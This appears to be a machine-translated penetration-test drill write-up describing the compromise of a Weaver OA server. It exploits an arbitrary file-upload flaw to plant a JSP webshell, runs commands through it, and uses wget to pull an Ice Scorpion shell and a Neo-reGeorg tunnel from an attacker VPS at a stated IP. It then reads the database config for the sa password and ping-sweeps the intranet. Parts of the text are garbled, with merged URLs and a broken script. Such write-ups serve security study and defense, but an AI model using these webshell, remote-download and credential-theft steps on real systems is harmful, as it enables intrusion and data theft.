Remember a certain offensive and defensive drill in actual combat
0x01 information collection In the early stage of relevant information collection work, it was found that the protection of the main station was very strict, the blast was locked, and the batch test tool would be banned, which was very difficult.
The subdomain name is enumerated, and after access, it is found that it is a business system, and the IP positioning is an overseas IP. It turned out that the company had overseas operations and finally found a relative marginal asset. Visit the homepage of the system's website and test the login box: grab the login package for testing, enter the account password at will and prompt the License submission page: Test file upload function point: Find that the cookie header contains ecology_JSession field name, verify that the fingerprint is a pan-micro OA application.
0x02 web dot Testing for vulnerabilities with the EXP of The Generic OA:
Tested the fan-micro OA weaver.common.Ctrl arbitrary file upload vulnerability, and uploaded a sentence jsp.
Manually test the sentence jsp:http://X.X.X.X/cloudstore/GyBtVQDJ.jsp cmd=whoami found that command execution can be performed, and the target system is Linux.
Determine whether the target machine is out of the network: the target machine tries to ping my VPS: The VPS listens on port 80, and the target machine tries to communicate with port 80. Found that the target machine can communicate with my VPS.
0x03 Establish a stronghold
1. Try to manage the target using the webshell: Generate the jsp webshell of the ice scorpion and try to drop the ice scorpion horse on the target machine. http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=ping X.X.X.X -c 4http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wgethttp://X.X.X.X
(1) Determine the absolute path of the website: The absolute path is: /data/bdip/weaver/ecology/
(2) VSP starts the temporary web service to publish the webshell, and the target machine executes the download command: Confirm that the ice scorpion horse falls under the absolute path of the target machine's website
。 http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=pwdhttp://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wget -P /data/bdip/weaver/ecology/ http://X.X.X.X/x.jsp uses ice scorpion to connect to the corresponding webshell, and the connection is successful:
2. Use http_tunnel management goals
(1) Use the Neo-reGeorg tool to generate the jsp: python3 neoreg.py generate -k xxxx
(2) Download the tunnel .jsp horse to the target machine: Confirm that the tunnel .jsp file falls to the root directory of the target machine.
(3) 在VPS上连接http tunnel jsp: http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wget -P /data/bdip/weaver/ecology http://149.28.22.33/xx.jsppython3 neoreg.py -u http://X.X.X.X/tunnel.jsp -k xxx -p 1001
(4) Verify access to the target intranet through the proxy chainns proxy tool:
0x04 The current foothold machine information is collected
1. Look for the database configuration file of the fan-micro OA connection:
2. View the configuration file of the connected database: The database is found to be an MSSQL database, and the database service is open locally.
3. View the data in the database: Get the password of the sa user and use the ice scorpion to connect to the database, you can see the data in the corresponding library:
http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=ls -lrth /data/bdip/weaver/ecology/WEB-INF/prop/weaver.propertieshttp://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=cat /data/bdip/weaver/ecology/WEB-INF/prop/weaver.properties
0x05 Intranet information collection 1, check the IP address of the current machine and the host IP address of the same network segment:
2. Detect the current network segment surviving host: because the socks5 proxy cannot proxy ping traffic. Therefore, prepare a ping.sh script on the VPS to temporarily turn on the http service. #!/bin/bashfor i in {1..254} do
ping -c2 -i0.3 -W1 X.X.X.$i &>/dev/null
if [ $? -eq 0 ];then
echo "X.X.X.$i is up" else
echo "X.X.X.$i is down"
The fidone target machine actively downloads the ping.sh script to the /opt directory:
To give ping.sh script executable permissions:
Run the ping.sh script to write the results of the probe into the file: look at the scan results, in addition to the foothold of this machine, the current network segment only 1 machine is alive.
There is a high probability that the surviving machine is a gateway, and there are no other machines that can move laterally.
Checked the hosts file and found that it was a cloud host, ending
Launched by geo